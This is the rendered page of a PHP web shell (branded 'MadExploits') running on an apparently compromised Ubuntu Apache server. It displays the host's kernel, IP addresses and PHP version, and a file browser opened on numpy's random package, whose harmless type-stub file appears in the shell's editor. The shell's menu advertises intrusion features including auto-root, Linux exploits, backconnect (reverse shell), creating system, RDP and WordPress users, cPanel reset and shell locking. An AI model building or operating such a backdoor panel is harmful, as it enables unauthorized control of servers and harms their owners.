Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
numpy /
random /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
_examples
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
__init__.pxd
431
B
-rw-r--r--
__init__.py
7.33
KB
-rw-r--r--
__init__.pyi
1.95
KB
-rw-r--r--
_bounded_integers.cpython-310-...
342.36
KB
-rw-r--r--
_bounded_integers.pxd
1.63
KB
-rw-r--r--
_common.cpython-310-x86_64-lin...
225.55
KB
-rw-r--r--
_common.pxd
4.64
KB
-rw-r--r--
_generator.cpython-310-x86_64-...
803.23
KB
-rw-r--r--
_generator.pyi
21.69
KB
-rw-r--r--
_mt19937.cpython-310-x86_64-li...
92.2
KB
-rw-r--r--
_mt19937.pyi
850
B
-rw-r--r--
_pcg64.cpython-310-x86_64-linu...
94.07
KB
-rw-r--r--
_pcg64.pyi
1.19
KB
-rw-r--r--
_philox.cpython-310-x86_64-lin...
79.55
KB
-rw-r--r--
_philox.pyi
1.09
KB
-rw-r--r--
_pickle.py
2.25
KB
-rw-r--r--
_sfc64.cpython-310-x86_64-linu...
53.09
KB
-rw-r--r--
_sfc64.pyi
835
B
-rw-r--r--
bit_generator.cpython-310-x86_...
166.84
KB
-rw-r--r--
bit_generator.pxd
1007
B
-rw-r--r--
bit_generator.pyi
3.51
KB
-rw-r--r--
c_distributions.pxd
5.89
KB
-rw-r--r--
mtrand.cpython-310-x86_64-linu...
678.04
KB
-rw-r--r--
mtrand.pyi
19.65
KB
-rw-r--r--
setup.py
6.03
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : __init__.pyi
from typing import List from numpy.random._generator import Generator as Generator from numpy.random._generator import default_rng as default_rng from numpy.random._mt19937 import MT19937 as MT19937 from numpy.random._pcg64 import ( PCG64 as PCG64, PCG64DXSM as PCG64DXSM, ) from numpy.random._philox import Philox as Philox from numpy.random._sfc64 import SFC64 as SFC64 from numpy.random.bit_generator import BitGenerator as BitGenerator from numpy.random.bit_generator import SeedSequence as SeedSequence from numpy.random.mtrand import ( RandomState as RandomState, beta as beta, binomial as binomial, bytes as bytes, chisquare as chisquare, choice as choice, dirichlet as dirichlet, exponential as exponential, f as f, gamma as gamma, geometric as geometric, get_state as get_state, gumbel as gumbel, hypergeometric as hypergeometric, laplace as laplace, logistic as logistic, lognormal as lognormal, logseries as logseries, multinomial as multinomial, multivariate_normal as multivariate_normal, negative_binomial as negative_binomial, noncentral_chisquare as noncentral_chisquare, noncentral_f as noncentral_f, normal as normal, pareto as pareto, permutation as permutation, poisson as poisson, power as power, rand as rand, randint as randint, randn as randn, random as random, random_integers as random_integers, random_sample as random_sample, ranf as ranf, rayleigh as rayleigh, sample as sample, seed as seed, set_state as set_state, shuffle as shuffle, standard_cauchy as standard_cauchy, standard_exponential as standard_exponential, standard_gamma as standard_gamma, standard_normal as standard_normal, standard_t as standard_t, triangular as triangular, uniform as uniform, vonmises as vonmises, wald as wald, weibull as weibull, zipf as zipf, ) __all__: List[str]
Close